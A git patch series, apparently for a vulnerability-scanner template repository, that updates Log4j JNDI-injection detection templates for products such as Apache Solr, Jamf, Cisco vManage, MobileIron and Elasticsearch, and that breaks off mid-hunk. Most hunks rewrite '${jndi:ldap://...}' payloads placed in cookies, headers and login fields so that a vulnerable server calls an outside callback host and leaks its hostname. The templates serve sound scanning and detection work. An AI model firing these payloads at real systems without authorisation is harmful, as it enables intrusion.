From 3cf8d0bd94e4b63ee8bd4320c9fe17b1295c581c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 3 May 2023 17:21:48 +0530 Subject: [PATCH 01/10] Update All Existing Log4j Templates --- .../vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml index 6945955a8d1..b5b082566d5 100644 --- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml @@ -21,12 +21,16 @@ info: shodan-query: http.html:"Apache OFBiz" tags: cve,cve2021,ofbiz,oast,log4j,rce,apache,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | GET /webtools/control/main HTTP/1.1 Host: {{Hostname}} - Cookie: OFBiz.Visitor=${jndi:ldap://${hostName}.{{interactsh-url}}} + Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}} matchers-condition: and matchers: @@ -38,13 +42,13 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/27 From b50e22b7daa75f6f66bbab39b80d20aa682cb8cb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Wed, 3 May 2023 23:21:44 +0530 Subject: [PATCH 02/10] updated log4j --- .../apache/apache-solr-log4j-rce.yaml | 11 +++++++--- .../apache/log4j/jamf-pro-log4j-rce.yaml | 18 ++++++++++------- .../cisco/cisco-cloudcenter-suite-rce.yaml | 11 +++++++--- .../cisco-unified-communications-log4j.yaml | 10 +++++++--- .../cisco/cisco-vmanage-log4j.yaml | 16 ++++++++++++--- .../code42/code42-log4j-rce.yaml | 20 ++++++++++++++++--- .../jamf/jamf-log4j-jndi-rce.yaml | 20 ++++++++++++++++--- .../mobileiron/mobileiron-log4j-jndi-rce.yaml | 20 ++++++++++++++++--- 8 files changed, 98 insertions(+), 28 deletions(-) diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml index d7d78ec319a..4aea6038dd3 100644 --- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml @@ -23,11 +23,15 @@ info: shodan-query: http.html:"Apache Solr" tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @timeout: 25s - GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7Bsys%3Aos.name%7D.{{interactsh-url}}%2F%7D HTTP/1.1 + GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-%7B%7Brand1%7D%7D%7D%24%7B%3A-%7B%7Brand2%7D%7D%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1 Host: {{Hostname}} attack: clusterbomb @@ -51,10 +55,11 @@ http: - type: regex part: interactsh_request regex: - - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: regex part: interactsh_request + group: 1 regex: - - '((W|w)(I|i)(N|n)(D|d)(O|o)(W|w)(S|s))|((L|l)(I|i)(N|n)(U|u)(X|x))\.' # Windows or Linux + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml index 8c7155c1953..da77e938cc7 100644 --- a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml +++ b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -31,7 +35,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&password= matchers-condition: and matchers: @@ -40,21 +44,21 @@ http: words: - "dns" - - type: regex - part: interactsh_request - regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - - type: word part: body words: - "Jamf Pro Login" + - type: regex + part: interactsh_request + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/27 diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml index 1fccd42a9ae..218b8ae0f89 100644 --- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml +++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml @@ -21,13 +21,17 @@ info: shodan-query: title:"CloudCenter Suite" tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @timeout: 10s POST /suite-auth/login HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}} + Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}} Content-Type: application/json {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"} @@ -42,7 +46,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -54,10 +58,11 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/22 diff --git a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml index 46eb5388115..135e266a538 100644 --- a/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -28,7 +32,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/ccmadmin/showHome.do - appNav=ccmadmin&j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin + appNav=ccmadmin&j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=admin matchers-condition: and matchers: @@ -40,7 +44,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval @@ -51,6 +55,6 @@ http: part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2022/10/04 diff --git a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml index f351b2e1c4a..dfce16b4afc 100644 --- a/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml +++ b/http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: log4j,cisco,tenable,cve,cve2021,rce,jndi,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -29,7 +33,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=admin&submit=Log+In matchers-condition: and matchers: @@ -41,7 +45,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -53,10 +57,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by CS 03/27/2023 diff --git a/http/vulnerabilities/code42/code42-log4j-rce.yaml b/http/vulnerabilities/code42/code42-log4j-rce.yaml index 6d11e828ccf..abbd0c80d8a 100644 --- a/http/vulnerabilities/code42/code42-log4j-rce.yaml +++ b/http/vulnerabilities/code42/code42-log4j-rce.yaml @@ -22,10 +22,14 @@ info: cwe-id: CWE-77 tags: jndi,log4j,rce,cve,cve2021,oast,code42,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - method: GET path: - - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&url=https://localhost' + - '{{BaseURL}}/c42api/v3/LoginConfiguration?username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&url=https://localhost' matchers-condition: and matchers: @@ -37,13 +41,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/27 diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml index 29572e5f487..a54153a2519 100644 --- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -21,6 +21,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -30,7 +34,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&password= matchers-condition: and matchers: @@ -47,13 +51,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/23 diff --git a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml index e7e3f3639ab..7ac2f291001 100644 --- a/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: jndi,log4j,rce,cve,cve2021,ivanti,oast,mobileiron,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -29,7 +33,7 @@ http: Referer: {{RootURL}}/mifs/user/login.jsp Content-Type: application/x-www-form-urlencoded - j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&j_password=password&logincontext=employee matchers-condition: and matchers: @@ -46,13 +50,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/23 From 89185ad7fe866853c1cd04d27dd930cf29fd4633 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 3 May 2023 23:31:55 +0530 Subject: [PATCH 03/10] fix --- .../vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml index 218b8ae0f89..d25ab91b691 100644 --- a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml +++ b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml @@ -58,7 +58,12 @@ http: kval: - interactsh_ip # Print remote interaction IP in output - extractors: + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 From 8da408f77c6d5286129bc8e622807561d1e01a9d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 3 May 2023 23:42:07 +0530 Subject: [PATCH 04/10] name update=id --- ...nter-suite-rce.yaml => cisco-cloudcenter-suite-log4j-rce.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/vulnerabilities/cisco/{cisco-cloudcenter-suite-rce.yaml => cisco-cloudcenter-suite-log4j-rce.yaml} (100%) diff --git a/http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml b/http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml similarity index 100% rename from http/vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml rename to http/vulnerabilities/cisco/cisco-cloudcenter-suite-log4j-rce.yaml From 82a852697851fab31799d3da1dbe638dd62528fb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Wed, 3 May 2023 23:51:23 +0530 Subject: [PATCH 05/10] updated templates --- .new-additions | 73 ++++++++++++++----- .../apache/apache-solr-log4j-rce.yaml | 12 ++- .../other/elasticsearch5-log4j-rce.yaml | 16 +++- .../other/goanywhere-mft-log4j-rce.yaml | 16 +++- http/vulnerabilities/other/graylog-log4j.yaml | 16 +++- 5 files changed, 105 insertions(+), 28 deletions(-) diff --git a/.new-additions b/.new-additions index 0265ab9a90b..7d2c21d7bc0 100644 --- a/.new-additions +++ b/.new-additions @@ -1,18 +1,55 @@ -http/cves/2020/CVE-2020-27481.yaml -http/cves/2021/CVE-2021-30175.yaml -http/cves/2021/CVE-2021-44228.yaml -http/cves/2023/CVE-2023-1671.yaml -http/cves/2023/CVE-2023-20864.yaml -http/cves/2023/CVE-2023-27350.yaml -http/cves/2023/CVE-2023-27524.yaml -http/cves/2023/CVE-2023-29489.yaml -http/cves/2023/CVE-2023-29922.yaml -http/default-logins/powerjob-default-login.yaml -http/default-logins/umami/umami-default-login.yaml -http/exposed-panels/papercut-ng-panel.yaml -http/exposed-panels/proxmox-panel.yaml -http/exposed-panels/sophos-web-appliance.yaml -http/misconfiguration/apache/apache-zeppelin-unauth.yaml -http/osint/mail-archive.yaml -http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml -http/vulnerabilities/wordpress/wpml-xss.yaml +cves/2017/CVE-2017-16894.yaml +cves/2020/CVE-2020-10199.yaml +cves/2021/CVE-2021-25078.yaml +cves/2021/CVE-2021-35250.yaml +cves/2022/CVE-2022-0747.yaml +cves/2022/CVE-2022-0769.yaml +cves/2022/CVE-2022-0773.yaml +cves/2022/CVE-2022-0846.yaml +cves/2022/CVE-2022-0864.yaml +cves/2022/CVE-2022-1903.yaml +cves/2022/CVE-2022-2219.yaml +cves/2022/CVE-2022-24223.yaml +cves/2022/CVE-2022-25485.yaml +cves/2022/CVE-2022-25486.yaml +cves/2022/CVE-2022-25487.yaml +cves/2022/CVE-2022-25488.yaml +cves/2022/CVE-2022-25489.yaml +cves/2022/CVE-2022-25497.yaml +cves/2022/CVE-2022-27926.yaml +cves/2022/CVE-2022-28032.yaml +cves/2022/CVE-2022-3062.yaml +cves/2022/CVE-2022-37190.yaml +cves/2022/CVE-2022-37191.yaml +cves/2022/CVE-2022-38295.yaml +cves/2022/CVE-2022-38296.yaml +cves/2022/CVE-2022-38467.yaml +cves/2022/CVE-2022-41441.yaml +cves/2022/CVE-2022-42094.yaml +cves/2022/CVE-2022-4321.yaml +cves/2023/CVE-2023-0099.yaml +cves/2023/CVE-2023-22620.yaml +cves/2023/CVE-2023-22897.yaml +cves/2023/CVE-2023-27008.yaml +cves/2023/CVE-2023-27159.yaml +cves/2023/CVE-2023-27179.yaml +cves/2023/CVE-2023-29084.yaml +default-logins/trassir/trassir-default-login.yaml +exposed-panels/appwrite-panel.yaml +exposed-panels/aspect-control-panel.yaml +exposures/logs/yii-error-page.yaml +misconfiguration/apollo-adminservice-unauth.yaml +misconfiguration/default-spx-key.yaml +misconfiguration/sql-server-report-viewer.yaml +misconfiguration/thinkphp-errors.yaml +network/detection/msmq-detect.yaml +network/enumeration/beanstalk-service.yaml +osint/hashnode.yaml +osint/imgbb.yaml +osint/rubygems.yaml +technologies/default-apache-shiro.yaml +technologies/switch-protocol.yaml +vulnerabilities/generic/cache-poisoning-xss.yaml +vulnerabilities/huawei/huawei-firewall-lfi.yaml +vulnerabilities/others/universal-media-xss.yaml +vulnerabilities/wordpress/ldap-wp-login-xss.yaml diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml index 4aea6038dd3..8a234bf6bc8 100644 --- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml @@ -31,7 +31,7 @@ http: - raw: - | @timeout: 25s - GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-%7B%7Brand1%7D%7D%7D%24%7B%3A-%7B%7Brand2%7D%7D%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1 + GET /solr/admin/{{endpoint}}?action=%24%7Bjndi%3Aldap%3A%2F%2F%24%7B%3A-{{rand1}}%7D%24%7B%3A-{{rand2}}}%7D.%24%7BhostName%7D.uri.{{interactsh-url}}%2F%7D HTTP/1.1 Host: {{Hostname}} attack: clusterbomb @@ -58,6 +58,16 @@ http: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml index 9b4cc42102c..aafce277c43 100644 --- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml +++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml @@ -20,10 +20,14 @@ info: verified: "true" tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | - GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D HTTP/1.1 + GET /_search?a=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D HTTP/1.1 Host: {{Hostname}} { @@ -43,17 +47,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2022/10/04 diff --git a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml index 4bfa8ecaf4c..6688348f264 100644 --- a/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml +++ b/http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,jndi,log4j,rce,oast,goanywhere,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -32,7 +36,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/goanywhere/auth/Login.xhtml - formPanel%3AloginGrid%3Aname=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} + formPanel%3AloginGrid%3Aname=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}&formPanel%3AloginGrid%3Avalue_hinput=pass&formPanel%3AloginGrid%3Avalue={{view}}}&formPanel%3AloginGrid%3AloginButton=&loginForm_SUBMIT=1&javax.faces.ViewState={{view}} cookie-reuse: true matchers-condition: and @@ -45,7 +49,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: regex @@ -60,10 +64,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - 